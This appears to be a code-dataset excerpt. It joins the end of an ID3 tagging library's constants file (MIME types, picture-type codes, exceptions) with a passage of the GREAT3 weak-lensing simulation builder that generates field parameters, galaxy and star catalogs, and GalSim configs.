IMAGE_GIF = 'image/gif'
IMAGE_IEF = 'image/ief'
IMAGE_JPEG = 'image/jpeg'
IMAGE_PNG = 'image/png'
IMAGE_SVG_XML = 'image/svg+xml'
IMAGE_TIFF = 'image/tiff'
IMAGE_VASA = 'image/vasa'
IMAGE_VND_WAP_WBMP = 'image/vnd.wap.wbmp'
IMAGE_X_FREEHAND = 'image/x-freehand'
IMAGE_X_ICON = 'image/x-icon'
IMAGE_X_PORTABLE_ANYMAP = 'image/x-portable-anymap'
IMAGE_X_PORTABLE_BITMAP = 'image/x-portable-bitmap'
IMAGE_X_PORTABLE_GRAYMAP = 'image/x-portable-graymap'
IMAGE_X_PORTABLE_PIXMAP = 'image/x-portable-pixmap'
IMAGE_X_RGB = 'image/x-rgb'
IMAGE_X_WINDOWDUMP = 'image/x-windowdump'
IMAGE_X_XBITMAP = 'image/x-xbitmap'
IMAGE_X_XPIXMAP = 'image/x-xpixmap'
MESSAGE_EXPERNAL_BODY = 'message/external-body'
MESSAGE_HTTP = 'message/http'
MESSAGE_NEWS = 'message/news'
MESSAGE_PARTIAL = 'message/partial'
MESSAGE_RFC822 = 'message/rfc822'
MODEL_VRML = 'model/vrml'
MULTIPART_ALTERNATIVE = 'multipart/alternative'
MULTIPART_BYTERANGES = 'multipart/byteranges'
MULTIPART_DIGEST = 'multipart/digest'
MULTIPART_ENCRYPTED = 'multipart/encrypted'
MULTIPART_FORM_DATA = 'multipart/form-data'
MULTIPART_MIXED = 'multipart/mixed'
MULTIPART_PARALLEL = 'multipart/parallel'
MULTIPART_RELATED = 'multipart/related'
MULTIPART_REPORT = 'multipart/report'
MULTIPART_SIGNED = 'multipart/signed'
MULTIPART_VOICE_MESSAGE = 'multipart/voice-message'
TEXT_COMMA_SEPARATED_VALUES = 'text/comma-separated-values'
TEXT_CSS = 'text/css'
TEXT_HTML = 'text/html'
TEXT_JAVASCRIPT = 'text/javascript'
TEXT_PLAIN = 'text/plain'
TEXT_RICHTEXT = 'text/richtext'
TEXT_RTF = 'text/rtf'
TEXT_TAB_SEPARATED_VALUES = 'text/tab-separated-values'
TEXT_VND_WAP_WML = 'text/vnd.wap.wml'
APPLICATION_VND_WAP_WMLC = 'application/vnd.wap.wmlc'
TEXT_VND_WAP_WMLSCRIPT = 'text/vnd.wap.wmlscript'
APPLICATION_VND_WAP_WMLSCRIPTC = 'application/vnd.wap.wmlscriptc'
TEXT_XML = 'text/xml'
TEXT_XML_EXTERNAL_PARSED_ENTIRY = 'text/xml-external-parsed-entity'
TEXT_X_SETEXT = 'text/x-setext'
TEXT_X_SGML = 'text/x-sgml'
TEXT_X_SPEECH = 'text/x-speech'
VIDEO_MPEG = 'video/mpeg'
VIDEO_MP4 = 'video/mp4'
VIDEO_QUICKTIME = 'video/quicktime'
VIDEO_VND_VIVO = 'video/vnd.vivo'
VIDEO_WEBM = 'video/webm'
VIDEO_X_MSVIDEO = 'video/x-msvideo'
VIDEO_X_SGI_MOVIE = 'video/x-sgi-movie'
WORKBOOK_FORMULAONE = 'workbook/formulaone'
X_WORLD_X_3DMF = 'x-world/x-3dmf'
X_WORLD_X_VRML = 'x-world/x-vrml'
MIME_TYPES_LIST = [MIME_TYPES.__dict__[i] for i in MIME_TYPES.__dict__.keys() if not i.startswith('__')]
class ID3v2_3_PICTURE_TYPES(object):
OTHER = '\x00'
FILE_ICON_32x32 = '\x01'
OTHER_FILE_ICON = '\x02'
COVER_FRONT = '\x03'
COVER_BACK = '\x04'
LEAFLET_PAGE = '\x05'
MEDIA = '\x06'
LEAD_ARTIST_LEAD_PERFORMER_SOLOIST = '\x07'
ARTIST_PERFORMER = '\x08'
CONDUCTOR = '\x09'
BAND_ORCHESTRA = '\x0A'
COMPOSER = '\x0B'
LYRICIST_TEXT_WRITER = '\x0C'
RECORDING_LOCATION = '\x0D'
DURING_RECORDING = '\x0E'
DURING_PERFORMANCE = '\x0F'
MOVIE_VIDEO_SCREEN_CAPTURE = '\x10'
A_BRIGHT_COLOURED_FISH = '\x11'
ILLUSTRATION = '\x12'
BAND_ARTIST_LOGOTYPE = '\x13'
PUBLISHER_STUDIO_LOGOTYPE = '\x14'
ID3v2_3_PICTURE_TYPES_LIST = [ID3v2_3_PICTURE_TYPES.__dict__[i] for i in ID3v2_3_PICTURE_TYPES.__dict__.keys()
if not i.startswith('__')]
# exceptions
class PyID3TaggerException(Exception):
pass
class PyID3TaggerNotImplementedError(PyID3TaggerException):
pass
class PyID3TaggerInvalidData(PyID3TaggerException):
pass
class PyID3TaggerIOError(PyID3TaggerException):
pass
class PyID3TaggerFilePathException(PyID3TaggerException):
pass
|
pkla6/pyid3tagger
|
pyid3tagger/const.py
|
Python
|
mit
| 54,824
|
[
"NetCDF"
] |
cc40c3804bd61a520f7236fdc18c326f8efb41fef7ce52e83bb211e90242de1f
|
# Copyright (c) 2014, the GREAT3 executive committee (http://www.great3challenge.info/?q=contacts)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted
# provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions
# and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of
# conditions and the following disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This file contains the SimBuilder class that does the heavy lifting; it coordinates all the steps
that are needed to generate parameters, catalogs, config files, images, and image packages for a
given GREAT3 branch (experiment, data type, shear type).
"""
import os
import datetime
import getpass
import numpy
import galsim
import great3sims.mapper
import great3sims.psf
import great3sims.noise
import great3sims.shear
import great3sims.galaxies
from . import constants
class SimBuilder(object):
# Per-experiment parameters; should be overridden by per-experiment subclasses (see customize())
experiment = None
real_galaxy = False
variable_psf = False
draw_psf_src = None
shear_value = None
shear_angle = None
multiepoch = False
@staticmethod
def customize(experiment, real_galaxy=None, variable_psf=None, multiepoch=None):
"""Create a custom subclass of SimBuilder with class variables overridden from
their default (control experiment) values depending on what keyword arguments are set.
"""
cls = type(experiment, (SimBuilder,), dict())
cls.experiment = experiment
if real_galaxy is not None:
cls.real_galaxy = real_galaxy
if variable_psf is not None:
cls.variable_psf = variable_psf
if multiepoch is not None:
cls.multiepoch = multiepoch
return cls
def __init__(self, root, obs_type, shear_type, gal_dir, ps_dir, opt_psf_dir, atmos_ps_dir,
public_dir, draw_psf_src, shear_value, shear_angle, truth_dir, preload=False, nproc=-1, gal_pairs=True):
"""Initialize a builder for the given `obs_type` and `shear_type`.
@param[in] root Root directory for generated files.
@param[in] obs_type Type of observation to simulate: either "ground" or "space".
@param[in] shear_type Type of shear field to generate: either "constant" or "variable".
@param[in] gal_dir Directory with real galaxy catalog information.
@param[in] ps_dir Directory with tabulated iCosmo shear power spectra.
@param[in] opt_psf_dir Directory with the optical PSF models for ground and space
variable PSF simulations.
@param[in] atmos_ps_dir Directory with tabulated atmospheric PSF anisotropy power spectra.
@param[in] public_dir Directory for placing files to be distributed publicly.
@param[in] truth_dir Directory for placing files to be used for metric evaluation.
@param[in] preload Preload the RealGalaxyCatalog images to speed up generation of large
numbers of real galaxies? Note that for parametric galaxy branches,
the catalog is never preloaded. [default = False]
@param[in] nproc How many processes to use in the config file. [default = -1]
@param[in] gal_pairs For constant shear branches, should it use 90 degree rotated pairs
to cancel out shape noise, or not? This option is ignored for
variable shear branches. [default: True]
@param[in] draw_psf_src Draw psf from a distribution?
@param[in] shear_value Value for constant shear experiments
@param[in] shear_angle Angle for constant shear experiments
"""
self.obs_type = obs_type
self.shear_type = shear_type
self.public_dir = public_dir
self.truth_dir = truth_dir
self.preload = preload
self.draw_psf_src = draw_psf_src
self.shear_value = shear_value
self.shear_angle = shear_angle
# Below we initialize the builders for the PSF, shear, galaxy population, and noise field.
# They each require various bits of information as appropriate (e.g., only the PSF builder
# needs to know where information about atmospheric PSFs lives).
self.psf_builder = great3sims.psf.makeBuilder(obs_type=obs_type,
variable_psf=self.variable_psf,
multiepoch=self.multiepoch,
shear_type=self.shear_type,
opt_psf_dir=opt_psf_dir,
atmos_ps_dir=atmos_ps_dir,
draw_psf_src=draw_psf_src)
self.shear_builder = great3sims.shear.makeBuilder(shear_type=shear_type, obs_type=obs_type,
multiepoch=self.multiepoch, ps_dir=ps_dir,
shear_value=shear_value, shear_angle=shear_angle)
self.galaxy_builder = great3sims.galaxies.makeBuilder(real_galaxy=self.real_galaxy,
obs_type=obs_type,
shear_type=shear_type,
multiepoch=self.multiepoch,
gal_dir=gal_dir,
preload=preload,
gal_pairs=gal_pairs)
self.noise_builder = great3sims.noise.makeBuilder(obs_type=obs_type,
multiepoch=self.multiepoch,
variable_psf = self.variable_psf)
# We also initialize a mapper, which assists with i/o for this branch. It knows how to make
# directory and file names depending on the branch, and what types of files need to be
# output for that branch.
self.mapper = great3sims.mapper.Mapper(root, self.experiment, obs_type, shear_type)
# And store some additional necessary information.
self.n_epochs = constants.n_epochs if self.multiepoch else 1
self.nproc = nproc
def writeParameters(self, seed):
"""Generate and write the metaparameters of the builder.
This creates four types of files:
- a single dict of parameters for the branch (=experiment+obs_type+shear_type combination)
- a dict of parameters for each field
- a dict of parameters for each subfield
- a dict of parameters for each subfield+epoch combination
The given seed (an integer) is the first of a sequence of sequential integers used to seed
random number generators for different steps; these seeds will be saved in the metaparameter
dictionaries to make simulation generation deterministic (and suitable for parallelization)
after this step. The last seed number used is returned.
"""
# First get some basic quantities for this branch: metadata, pixel scale, and the grouping
# of subfields into fields with identical PSF and shear fields
metadata = {"timestamp": str(datetime.datetime.now()), "user": getpass.getuser()}
pixel_scale = constants.pixel_scale[self.obs_type][self.multiepoch]
n_subfields = constants.n_subfields
n_subfields_per_field = constants.n_subfields_per_field[self.shear_type][self.variable_psf]
if n_subfields % n_subfields_per_field != 0:
raise RuntimeError("%d subfields does not divide evenly into %d fields!" % \
(n_subfields, n_subfields_per_field) )
n_fields = n_subfields / n_subfields_per_field
# Also check some things about the deep fields. We need to figure out how many to make.
n_deep_subfields = constants.n_deep_subfields
if n_deep_subfields % n_subfields_per_field != 0:
raise RuntimeError("%d deep subfields does not divide evenly into %d fields!" %\
(n_deep_subfields, n_subfields_per_field) )
n_reg_subfields = n_subfields - n_deep_subfields
if constants.deep_frac > float(n_deep_subfields) / n_reg_subfields:
raise RuntimeError("%d subfields is insufficient for %f deep fraction!" % \
(n_deep_subfields, constants.deep_frac) )
n_deep_fields = n_deep_subfields / n_subfields_per_field
n_reg_fields = n_fields - n_deep_fields
# A note regarding these deep fields: in most respects they are to be like the regular
# fields. For example, galaxy selection is the same: we only make images of galaxies that
# would be observed at S/N>=20 in the regular fields. PSF and shear determination is
# carried out in the same way. The only difference comes in the noise builder, when
# choosing the level of noise to add (all the way down at the level of epochs). Even then,
# we use the same typical noise variance for all stored quantities - so that galaxy
# selection can use them - and use a multiplicative factor to tell it to add less noise for
# the deep field.
# Put together the basic parameters to be stored in the metaparameters file.
self.parameters = {"metadata": metadata, "seed": seed, "pixel_scale": pixel_scale,
"n_fields": n_fields}
# And use the mapper to write them out.
self.mapper.write(self.parameters, 'parameters', self.parameters)
# Now, initialize a RNG with the required seed. We'll use that to set up seeds for
# everything else that follows.
rng = galsim.UniformDeviate(seed)
# We also have to set up schema for catalogs and such. We'll set up a basic schema here, as
# well as schema to be used for shear-related parameters.
base_schema = [("index", int), ("x", int), ("y", int),
("xshift", float), ("yshift", float),
("xmin", int), ("xmax", int), ("ymin", int), ("ymax", int)]
shear_schema = [("g1", float), ("g2", float), ("mu", float),
("x_field_pos", int), ("y_field_pos", int), ("ID", int)]
seed += 1 # We could also draw random integers to set seeds, but based on a discussion, it
# does not seem necessary
# Start a separate sequence for noise_seed, which will be used to make the noise fields in
# the images. The second number is just a random number that is much larger than the
# plausible number of items in the original seed sequence. (It is phi * 10^6.)
noise_seed = seed + 1618033
# Now we begin to loop over successively smaller units - starting with field, then subfield,
# then epoch. For each of these, we will generate the necessary parameters.
for field_index in xrange(n_fields):
# A given field has the same shear and per-epoch PSF. Thus, we set up the shear and PSF
# parameters at the field level.
#
# The builders can decide what format to use for the results of
# generateFieldParameters(). We don't actually care what that format is out here - we
# will just pass it along to generateSubfieldParameters() or generateEpochParameters(),
# which are other methods of the builders. So we require internal consistency between
# the various generate*Parameters() methods, but we should be able to switch parameter
# selection between the field/subfield/epoch layer without modifying this code, just
# modifying the builders themselves (in psf.py, shear.py, noise.py, or galaxies.py).
field_shear_parameters = self.shear_builder.generateFieldParameters(rng, field_index)
field_psf_parameters = self.psf_builder.generateFieldParameters(rng, field_index)
# Now we set up a `field_parameters` dict which includes the field parameters we just
# generated for the shear and PSF, as well as other basic info like "which field is
# this", the offsets of subfields within the field (see call to
# generateSubfieldOffsets() below), the random seed, and some metadata.
field_parameters = {
"shear": field_shear_parameters,
"psf": field_psf_parameters,
"field_index": field_index,
"subfield_offsets": self.generateSubfieldOffsets(
rng, n_subfields_per_field,
constants.subfield_grid_subsampling),
"metadata": metadata,
"seed": seed,
}
seed += 1
# Use the mapper to write the field parameters to file.
self.mapper.write(field_parameters, 'field_parameters', field_parameters)
# Now loop over subfields within this field.
field_min_subfield = field_index * n_subfields_per_field
field_max_subfield = field_min_subfield + n_subfields_per_field - 1
for subfield_index in xrange(field_min_subfield, field_max_subfield+1):
# A given subfield has the same shear (already determined at field level) and
# galaxies. But to allow for flexibility later on, we'll have a
# generateSubfieldParameters() for the shear builder anyway; it has to take the
# output of generateFieldParameters() as an input. For now, it's a no-op, returning
# the input as output - but that might not be the case later on.
#
# As at the field level, we then collect the subfield parameters (which are the
# field-level shear parameters and the galaxy parameters determined at the subfield
# level), plus some other necessary bits of data.
subfield_parameters = {
"shear": self.shear_builder.generateSubfieldParameters(rng, subfield_index,
field_shear_parameters),
"galaxy": self.galaxy_builder.generateSubfieldParameters(rng, subfield_index),
"subfield_index": subfield_index,
"subfield_offset": \
field_parameters["subfield_offsets"][subfield_index-field_min_subfield],
"field_index": field_index,
"metadata": metadata,
"seed": seed,
}
seed += 1
# Include schema for the subfield-level parameters.
subfield_parameters["subfield_schema"] = \
(base_schema + shear_schema + subfield_parameters["galaxy"]["schema"])
# Use the mapper to write the subfield parameters to file.
self.mapper.write(subfield_parameters, 'subfield_parameters', subfield_parameters)
# Finally, loop over the epoch.
for epoch_index in xrange(self.n_epochs):
# Each epoch has its own PSF (already determined at field level) and noise.
# But the galaxies and shears were determined at the subfield level, so nothing
# new is needed here.
epoch_parameters = dict(subfield_parameters)
epoch_parameters["psf"] = \
self.psf_builder.generateEpochParameters(rng, subfield_index, epoch_index,
field_psf_parameters)
# We also determine noise-related parameters at the epoch level. So, here we
# determine a multiplying factor for the sky variance based on whether we are in
# a deep field or not. Note that changes in the sky variance due to single
# vs. multiepoch images are handled directly in the noise_builder (which knows
# what branch we're in), so they do not need to be included here.
if subfield_index < n_reg_subfields:
noise_mult = 1.
else:
noise_mult = constants.deep_variance_mult
if self.obs_type == "ground" and not self.draw_psf_src:
epoch_parameters["noise"] = \
self.noise_builder.generateEpochParameters(
rng, subfield_index, epoch_index,
field_parameters["psf"]["atmos_psf_fwhm"], noise_mult)
else:
epoch_parameters["noise"] = \
self.noise_builder.generateEpochParameters(rng, subfield_index,
epoch_index, None,
noise_mult)
epoch_parameters["epoch_index"] = epoch_index
epoch_parameters["subfield_index"] = subfield_index
epoch_parameters["field_index"] = field_index
epoch_parameters["seed"] = seed
seed += 1
epoch_parameters["noise_seed"] = noise_seed
noise_seed += constants.nrows * constants.ncols
epoch_parameters["epoch_schema"] = (epoch_parameters["subfield_schema"]
+ epoch_parameters["psf"]["schema"])
epoch_parameters["star_schema"] = \
base_schema + epoch_parameters["psf"]["schema"]
# `xdither`, `ydither` are the amount of dithering between epochs of this
# subfield. In contrast, `epoch_offset` (a tuple) is the amount of offsetting
# between this subfield and the first one in the field, i.e., it's the same as
# `subfield_offset`. This is not truly a per-epoch parameter, however, it is
# included here so that the per-epoch catalog maker (specifically, for PSFs)
# will be able to do its job.
if self.multiepoch:
epoch_parameters["xdither"] = (2.0 * rng() - 1.0) * \
constants.epoch_shift_max
epoch_parameters["ydither"] = (2.0 * rng() - 1.0) * \
constants.epoch_shift_max
else:
epoch_parameters["xdither"] = 0.0
epoch_parameters["ydither"] = 0.0
epoch_parameters["epoch_offset"] = subfield_parameters["subfield_offset"]
self.mapper.write(epoch_parameters, 'epoch_parameters', epoch_parameters)
return seed
def writeSubfieldCatalog(self, subfield_index):
"""Given the subfield index, load the corresponding metaparameters (previously generated by
writeParameters()), and use them to generate a catalog of galaxies and shear values.
"""
# Read the subfield and field parameters.
subfield_parameters = self.mapper.read("subfield_parameters", subfield_index=subfield_index)
field_parameters = self.mapper.read(
"field_parameters",
field_index = ( subfield_index /
constants.n_subfields_per_field[self.shear_type][self.variable_psf] )
)
# Set up a catalog with the appropriate schema.
catalog = numpy.zeros(constants.nrows * constants.ncols,
dtype=numpy.dtype(subfield_parameters["subfield_schema"]))
index = 0
# Use the given seed to initialize a RNG.
rng = galsim.UniformDeviate(subfield_parameters["seed"])
# Loop over the galaxies and generate some basic numbers like where they belong in the image
# corresponding to this subfield, what is their centroid shift compared to the nominal
# position, etc.
for row in xrange(constants.nrows):
for col in xrange(constants.ncols):
# The numbers below are all in pixels.
sx = (2.0*rng() - 1.0) * constants.centroid_shift_max
sy = (2.0*rng() - 1.0) * constants.centroid_shift_max
record = catalog[index]
record['index'] = index
record['xmin'] = col * constants.xsize[self.obs_type][self.multiepoch]
record['ymin'] = row * constants.ysize[self.obs_type][self.multiepoch]
record['xmax'] = (col + 1) * constants.xsize[self.obs_type][self.multiepoch] - 1
record['ymax'] = (row + 1) * constants.ysize[self.obs_type][self.multiepoch] - 1
record['x'] = (record['xmin'] + record['xmax']) / 2
record['y'] = (record['ymin'] + record['ymax']) / 2
record['xshift'] = sx
record['yshift'] = sy
index += 1
# Determine multiplying factor for the sky variance based on whether we are in a deep field
# or not. Note that sky variance changes due to single vs. multiepoch images are not
# included at this stage, because we want to impose our cuts based on whether the S/N would
# be 20 in a single combined image, not based on its value in the individual epoch images.
# Also note that while the noise variance parameter output into the epoch_parameters files
# by the noise builder already includes this noise_mult for the deep fields (and any factors
# due to single vs. multiepoch which we do *not* want here), we have to recalculate the deep
# field noise multiplying factor because we're just going to use the
# noise_builder.typical_variance which does not include any of those factors.
if subfield_index < constants.n_subfields - constants.n_deep_subfields:
noise_mult = 1.
else:
noise_mult = constants.deep_variance_mult
# We give the galaxy catalog generation routine a value for seeing to use when selecting
# galaxies. This calculation becomes more complex in the multi-epoch case since we have to
# decide on a relevant effective FWHM.
effective_seeing = None
if not self.obs_type == "space":
# Note: really we care about the full PSF FWHM, not just the atmospheric part. However,
# we use the seeing as a proxy for it, so we don't have to start generating images. If
# this seems really worrisome, we could make some simple sims, derive approximate rules
# for total PSF size including optics as well (which will mainly affect really
# good-seeing images), and use those instead of just the atmospheric seeing.
if not self.draw_psf_src:
if not self.multiepoch and not self.variable_psf:
# For single epoch images with a constant PSF, the FWHM is just a single (scalar)
# value for the entire subfield.
effective_seeing = field_parameters["psf"]["atmos_psf_fwhm"]
else:
# This is a 1d numpy array of FWHM values. We determine a single effective seeing
# value from it.
seeing = field_parameters["psf"]["atmos_psf_fwhm"]
effective_seeing = 1. / numpy.mean(1./seeing)
# The galaxy builder generates a catalog given some noise variance information (which
# determines galaxy S/N), and the effective seeing (for selecting galaxies that are
# resolved).
self.galaxy_builder.generateCatalog(rng, catalog, subfield_parameters,
self.noise_builder.typical_variance, noise_mult,
effective_seeing)
# The shear builder generates shear values for the catalog.
self.shear_builder.generateCatalog(rng, catalog, subfield_parameters["shear"],
subfield_parameters["subfield_offset"], subfield_index)
# The mapper writes out the galaxy catalog for this subfield in the appropriate directory
# and file.
self.mapper.write(catalog, "subfield_catalog", subfield_parameters)
def writeEpochCatalog(self, subfield_index, epoch_index):
"""Given the subfield and epoch indices, load the epoch metaparameters and a
previously-generated subfield catalog. Then, add per-object PSF parameter information (and
possibly shift the centroids) to create and save an epoch catalog.
"""
# First, read in the stored parameter information and subfield catalog.
epoch_parameters = self.mapper.read('epoch_parameters', subfield_index=subfield_index,
epoch_index=epoch_index)
subfield_catalog = self.mapper.read('subfield_catalog', epoch_parameters)
# Make a catalog for this epoch, according to the stored schema.
epoch_catalog = numpy.zeros(constants.nrows * constants.ncols,
dtype=numpy.dtype(epoch_parameters["epoch_schema"]))
# Initialize a RNG with the given seed.
rng = galsim.UniformDeviate(epoch_parameters["seed"])
# First, just carry over values from the subfield catalog into the epoch catalog.
for name, _ in epoch_parameters["subfield_schema"]:
epoch_catalog[name] = subfield_catalog[name]
# Then, generate the PSF information for the catalog, given the parameters for this epoch.
self.psf_builder.generateCatalog(rng, epoch_catalog, epoch_parameters,
epoch_parameters["epoch_offset"], normalized=True)
# Write out the epoch-level catalog for the galaxies.
self.mapper.write(epoch_catalog, "epoch_catalog", epoch_parameters)
# We also need a star catalog for this epoch. To set up the positions in the catalog,
# figure out the size that each star postage stamp will cover. (These should be the same as
# the sizes covered by galaxy postage stamps.)
xsize = constants.xsize[self.obs_type][self.multiepoch]
ysize = constants.ysize[self.obs_type][self.multiepoch]
# Then write star catalog entries, which depends on whether this is a variable PSF branch or
# not.
if self.variable_psf:
# We have to write catalog entries indicating the "true" star position within the
# **field** (not subfield). We also have to write x, y entries that are used to place
# the objects on an image grid, the parameters of which are to be defined here.
#
# Finally, let's define a galsim.DistDeviate to use to draw random values of S/N for
# each star. The distribution of S/N values comes from a catalog of main sequence stars
# for galactic longitude=180 degrees, in the I band, from the LSST ImSim. Reading
# numbers off a plot from Chihway Chang and assuming that the S/N of an I=25 star is 25,
# the function we get is
# dN/d(S/N) ~ (mag - 18) / S/N
# ~ (-2.5 log10(S/N) + 10.5) / S/N.
# We assume that the distribution of star S/N values can go from 25 to 400, with higher
# S/N stars being excluded due to saturation.
dist_deviate = galsim.DistDeviate(
rng,
function = lambda x : (-2.5*numpy.log10(x)+10.5)/x, x_min=25., x_max=400.)
# First, determine how many stars should be in this subfield, which will determine the
# size of the catalog to write. Note that this is for a single subfield, which means
# the number of stars should be 1/20 of those for the entire field.
n_star_linear = epoch_parameters["psf"]["n_star_linear"]
star_catalog = numpy.zeros(n_star_linear * n_star_linear,
dtype=numpy.dtype(epoch_parameters["star_schema"]))
index = 0
# Loop over the entries in the star catalog.
for row in xrange(n_star_linear):
for col in xrange(n_star_linear):
# The numbers below are in pixels, and are used to define image positions.
sx = (2.0*rng() - 1.0) * constants.centroid_shift_max
sy = (2.0*rng() - 1.0) * constants.centroid_shift_max
record = star_catalog[index]
record['index'] = index
record['xmin'] = col * constants.xsize[self.obs_type][self.multiepoch]
record['ymin'] = row * constants.ysize[self.obs_type][self.multiepoch]
record['xmax'] = (col + 1) * constants.xsize[self.obs_type][self.multiepoch] - 1
record['ymax'] = (row + 1) * constants.ysize[self.obs_type][self.multiepoch] - 1
record['x'] = (record['xmin'] + record['xmax']) / 2
record['y'] = (record['ymin'] + record['ymax']) / 2
# Here are some numbers that we'll only compute if it's the first epoch. Since
# we want to represent the same star population in each epoch, we store them in
# the cache after generating the first epoch, and read from the cache if it's
# not the first epoch.
if epoch_index == 0:
record['xshift'] = sx
record['yshift'] = sy
# But these numbers are the true positions within the field.
record['x_field_true_deg'] = constants.image_size_deg * rng()
record['y_field_true_deg'] = constants.image_size_deg * rng()
# Finally, let's make a S/N value for this star (per epoch). In other
# words, the star would have S/N=record['star_snr'] in a single-epoch
# branch, or in each of the images in a multi-epoch branch. This differs
# from our handling of galaxies, where the flux is split up among the
# different epochs. The rationale (possibly weak?) is this: most people
# will choose some range of stars to use for PSF estimation, and put that
# selection into their star-finder before estimating PSF. That means that
# if they have one long exposure vs. a few shorter ones, and they have to
# estimate the PSF per exposure, they would legitimately select different
# sets of stars in the two cases. (e.g., in the one long exposure, some
# stars might be saturated and unusable, whereas for fewer short exposures,
# they could be used.) We are glossing over the slight difference in star
# number density that should also occur, and just using the fact that the
# S/N distribution should be similar.
record['star_snr'] = dist_deviate()
index += 1
if epoch_index == 0:
self.cached_xshift = star_catalog['xshift']
self.cached_yshift = star_catalog['yshift']
self.cached_x_field_true_deg = star_catalog['x_field_true_deg']
self.cached_y_field_true_deg = star_catalog['y_field_true_deg']
self.cached_star_snr = star_catalog['star_snr']
else:
star_catalog['xshift'] = self.cached_xshift
star_catalog['yshift'] = self.cached_yshift
star_catalog['x_field_true_deg'] = self.cached_x_field_true_deg
star_catalog['y_field_true_deg'] = self.cached_y_field_true_deg
star_catalog['star_snr'] = self.cached_star_snr
else:
# For constant PSF branches, the star catalog generation is much simpler.
star_catalog = numpy.zeros(constants.nx_constpsf * constants.ny_constpsf,
dtype=numpy.dtype(epoch_parameters["star_schema"]))
index = 0
for yc in xrange(constants.ny_constpsf):
for xc in xrange(constants.nx_constpsf):
# The numbers below are in pixel units.
record = star_catalog[index]
record["xmin"] = xc * xsize
record["ymin"] = yc * ysize
record["xmax"] = (xc + 1) * xsize - 1
record["ymax"] = (yc + 1) * ysize - 1
record["index"] = index
record["x"] = (record["xmin"] + record["xmax"]) / 2
record["y"] = (record["ymin"] + record["ymax"]) / 2
# Here are some numbers that we will save in a cache, only computing for the
# first epoch in a field, so as to preserve the random subpixel shifts between
# stars in the starfield. This way simple coaddition will work for all stars in
# one of the constant PSF starfields.
if epoch_index == 0:
if index > 0:
sx = (2.0*rng() - 1.0) * constants.centroid_shift_max
sy = (2.0*rng() - 1.0) * constants.centroid_shift_max
record["xshift"] = sx
record["yshift"] = sy
else:
record["xshift"] = 0
record["yshift"] = 0
index += 1
if epoch_index == 0:
self.cached_xshift = star_catalog['xshift']
self.cached_yshift = star_catalog['yshift']
else:
star_catalog['xshift'] = self.cached_xshift
star_catalog['yshift'] = self.cached_yshift
# Given the basic catalog information generated above, make the catalog of PSF parameters
# (e.g., optical PSF and atmospheric PSF parameters) for each star.
self.psf_builder.generateCatalog(rng, star_catalog, epoch_parameters,
epoch_parameters["epoch_offset"], normalized=False)
# Write the star catalog to file in the appropriate location and format.
self.mapper.write(star_catalog, "star_catalog", epoch_parameters)
def writeStarTestCatalog(self, subfield_min, subfield_max):
"""Given a range of subfield and epoch indices, write a test catalog for generating star
images to check for oddities. We want a small set of objects (suitable for eyeballing)
chosen in a representative way."""
n_subfields = subfield_max + 1 - subfield_min
# Define a final catalog with some additional information about subfield / epoch. That
# way if we find a problematic star image in the data cube, we know where it came from.
epoch_parameters = self.mapper.read('epoch_parameters', subfield_index=subfield_min,
epoch_index=0)
test_schema = epoch_parameters["star_schema"]
test_schema.append(("subfield", int))
test_schema.append(("epoch", int))
test_schema.append(("star_catalog_entry", int))
test_catalog = numpy.zeros(n_subfields * self.n_epochs, dtype=numpy.dtype(test_schema))
# Now loop over subfields and epochs.
test_ind = 0
for subfield_index in xrange(subfield_min, subfield_max+1):
for epoch_index in xrange(self.n_epochs):
# Read in the epoch parameters and star catalog.
epoch_parameters = self.mapper.read('epoch_parameters',
subfield_index=subfield_index,
epoch_index=epoch_index)
star_catalog = self.mapper.read("star_catalog", epoch_parameters)
# What we do with the catalog depends on whether it's a constant or variable PSF
# branch. We have to choose which star in the catalog we want to use differently in
# these cases.
if not self.variable_psf:
# For constant PSF, just transfer the first entry (i.e., the non-offset one) to
# the test catalog.
star_cat_ind = 0
else:
# For variable PSF, find the index of the most aberrated PSF in the catalog. In
# general, more aberrated PSFs are the ones that might have the most numerical
# difficulties in the rendering process.
tot_aber = numpy.zeros(len(star_catalog))
for aber in self.psf_builder.use_aber:
tot_aber += star_catalog[self.psf_builder.opt_schema_pref+aber]**2
star_cat_ind = numpy.argmax(tot_aber)
# We cannot just do
# test_catalog[test_ind] = star_catalog[0]
# because the schema are not identical. Instead we loop over the schema entries for
# star_catalog, and transfer the information for each one over to test_catalog.
for schema_entry in epoch_parameters["star_schema"]:
test_catalog[schema_entry[0]][test_ind] = \
star_catalog[schema_entry[0]][star_cat_ind]
test_catalog["subfield"][test_ind] = subfield_index
test_catalog["epoch"][test_ind] = epoch_index
test_catalog["star_catalog_entry"][test_ind] = star_cat_ind
test_ind += 1
# Write to the appropriate file and directory as specified by the mapper.
self.mapper.write(test_catalog, "star_test_catalog", epoch_parameters)
def writeConfig(self, experiment, obs_type, shear_type, subfield_min, subfield_max):
"""This function writes yaml-style config files that can be used by GalSim to automatically
generate the galaxy, star, and test images for this branch and range of subfields."""
# Build the dictionary, which we'll output with yaml.dump()
# We start with the PSF dict, which has much in common with the gal dict.
# After we write that out, we'll change what has to change and add the gal field.
d = {}
# We'll use this same format_items several times below:
format_items = [
